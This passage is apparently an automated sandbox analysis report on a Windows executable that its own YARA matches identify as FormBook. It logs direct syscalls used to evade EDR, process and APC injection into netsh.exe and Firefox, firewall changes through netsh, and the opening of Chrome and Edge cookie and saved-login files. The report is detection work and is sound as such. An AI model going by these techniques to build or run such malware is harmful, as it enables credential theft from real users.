            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A8B42 mov eax, dword ptr fs:[00000030h]1_2_011A8B42
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h]1_2_01196B40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196B40 mov eax, dword ptr fs:[00000030h]1_2_01196B40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CAB40 mov eax, dword ptr fs:[00000030h]1_2_011CAB40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8B50 mov eax, dword ptr fs:[00000030h]1_2_010F8B50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FCB7E mov eax, dword ptr fs:[00000030h]1_2_010FCB7E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h]1_2_011B4BB0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B4BB0 mov eax, dword ptr fs:[00000030h]1_2_011B4BB0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h]1_2_01110BBE
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110BBE mov eax, dword ptr fs:[00000030h]1_2_01110BBE
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AEBD0 mov eax, dword ptr fs:[00000030h]1_2_011AEBD0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]1_2_01120BCB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]1_2_01120BCB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120BCB mov eax, dword ptr fs:[00000030h]1_2_01120BCB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]1_2_01100BCD
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]1_2_01100BCD
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100BCD mov eax, dword ptr fs:[00000030h]1_2_01100BCD
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]1_2_01108BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]1_2_01108BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108BF0 mov eax, dword ptr fs:[00000030h]1_2_01108BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118CBF0 mov eax, dword ptr fs:[00000030h]1_2_0118CBF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EBFC mov eax, dword ptr fs:[00000030h]1_2_0112EBFC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118CA11 mov eax, dword ptr fs:[00000030h]1_2_0118CA11
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h]1_2_01124A35
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01124A35 mov eax, dword ptr fs:[00000030h]1_2_01124A35
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA24 mov eax, dword ptr fs:[00000030h]1_2_0113CA24
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112EA2E mov eax, dword ptr fs:[00000030h]1_2_0112EA2E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106A50 mov eax, dword ptr fs:[00000030h]1_2_01106A50
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h]1_2_01110A5B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110A5B mov eax, dword ptr fs:[00000030h]1_2_01110A5B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h]1_2_0117CA72
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117CA72 mov eax, dword ptr fs:[00000030h]1_2_0117CA72
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AEA60 mov eax, dword ptr fs:[00000030h]1_2_011AEA60
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]1_2_0113CA6F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]1_2_0113CA6F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113CA6F mov eax, dword ptr fs:[00000030h]1_2_0113CA6F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138A90 mov edx, dword ptr fs:[00000030h]1_2_01138A90
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80 mov eax, dword ptr fs:[00000030h]1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4A80 mov eax, dword ptr fs:[00000030h]1_2_011D4A80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h]1_2_01108AA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108AA0 mov eax, dword ptr fs:[00000030h]1_2_01108AA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: yZcecBUXN7.exe, WO-.csReference to suspicious API methods: _003B_2964_05B4.MapVirtualKey(_05B5.union.keyboardInput.wVk, 0)
            Source: yZcecBUXN7.exe, ---.csReference to suspicious API methods: _003B_2964_05B4.GetAsyncKeyState(16)
            Source: yZcecBUXN7.exe, ---.csReference to suspicious API methods: _003B_2964_05B4.OpenProcess(_FFFDi, _0739_0300, K_07FB_06E8)
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory written: C:\Users\user\Desktop\yZcecBUXN7.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3020Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netsh.exeThread APC queued: target process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"Jump to behavior
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yZcecBUXN7.exeBinary or memory string: Progman
            Source: yZcecBUXN7.exeBinary or memory string: IsProgmanWindow
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: yZcecBUXN7.exeBinary or memory string: tUser32FocusedMenuhwndMenuhMenuNonClientSysMenuRawTextRange_ScrollIntoViewRawScrollItemPattern_ScrollIntoViewget_CurrentViewRawMultipleViewPattern_SetCurrentViewget_Rowget_WindowIsKnownBadWindowRawUiaEventAddWindowGetFirstOrLastOwnedWindowGetFocusedWindowRawUiaEventRemoveWindowFindModalWindowIsTopLevelWindowIsProgmanWindowIsTransformPatternWindowIsWindowPatternWindowGetDesktopWindowIsWindowSwitchToThisWindowGetWindowGetModuleFileNameExpt_xdxCZGwDCEsywxZZUZfkyhhxget_LabeledBypt_yInitializeArrayToArrayToCharArrayPropertyArrayToIntArrayConvertToElementArraydyIsExtendedKeyMapVirtualKeyVirtualKeyFromKeyget_AcceleratorKeyget_AccessKeyRegisterHotKeyUnregisterHotKeyget_AssemblyGetExecutingAssemblyRegisterClientSideProviderAssemblyGetAssemblyRegisterProxyAssemblyget_IsReadOnlyRaiseEventInThisClientOnlyIndexOfAnyOnEventObjectDestroyCopyget_NonClientMenuBarProxyFactoryget_NonClientProxyFactoryget_User32FocusedMenuProxyFactoryget_NonClientSysMenuProxyFactoryGetProxyFromEntryDictionaryEntryop_Equalityop_InequalityAccessibilitySystem.Securityget_EmptyIsNullOrEmptyget_IsEmptyget_PropertyRuntimeIdPropertyFrameworkIdPropertyAutomationIdPropertyProcessIdPropertyIsEnabledPropertyIsSelectionRequiredPropertyIsSelectedPropertyContainingGridPropertyIsPasswordPropertyLargeChangePropertySmallChangePropertyIsGridPatternAvailablePropertyIsInvokePatternAvailablePropertyIsTablePatternAvailablePropertyIsTogglePatternAvailablePropertyIsExpandCollapsePatternAvailablePropertyIsRangeValuePatternAvailablePropertyIsValuePatternAvailablePropertyIsDockPatternAvailablePropertyIsScrollPatternAvailablePropertyIsGridItemPatternAvailablePropertyIsTableItemPatternAvailablePropertyIsScrollItemPatternAvailablePropertyIsSelectionItemPatternAvailablePropertyIsTransformPatternAvailablePropertyIsSelectionPatternAvailablePropertyIsTextPatternAvailablePropertyIsMultipleViewPatternAvailablePropertyIsWindowPatternAvailablePropertyVerticallyScrollablePropertyHorizontallyScrollablePropertyIsKeyboardFocusablePropertyNativeWindowHandlePropertyBoundingRectanglePropertyCanSelectMultiplePropertyClassNamePropertyLocalizedControlTypePropertyItemTypePropertyCulturePropertyToggleStatePropertyExpandCollapseStatePropertyWindowVisualStatePropertyWindowInteractionStatePropertyCanRotatePropertyValuePropertyCanMovePropertyVerticalViewSizePropertyHorizontalViewSizePropertyCanMinimizePropertyCanMaximizePropertyCanResizePropertyIsModalPropertyIsRequiredForFormPropertyMinimumPropertyMaximumPropertyColumnSpanPropertyRowSpanPropertyIsOffscreenPropertyColumnPropertyAutomationPropertyOrientationPropertySelectionPropertyDockPositionPropertySelectionContainerPropertyRowOrColumnMajorPropertyHasPropertyColumnHeaderItemsPropertyRowHeaderItemsPropertyColumnHeadersPropertyRowHeadersPropertyHasKeyboardFocusPropertyItemStatusPropertySupportedViewsPropertyVerticalScrollPercentPropertyHorizontalScrollPercentPropertyIsControlElementPropertyIsContentElementPropertyClickablePointPropertyColumnCountPropertyRowCountPropertyIsTopmostPropert
            Source: yZcecBUXN7.exeBinary or memory string: CommentsWindows Progman Group ConverterL
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Users\user\Desktop\yZcecBUXN7.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
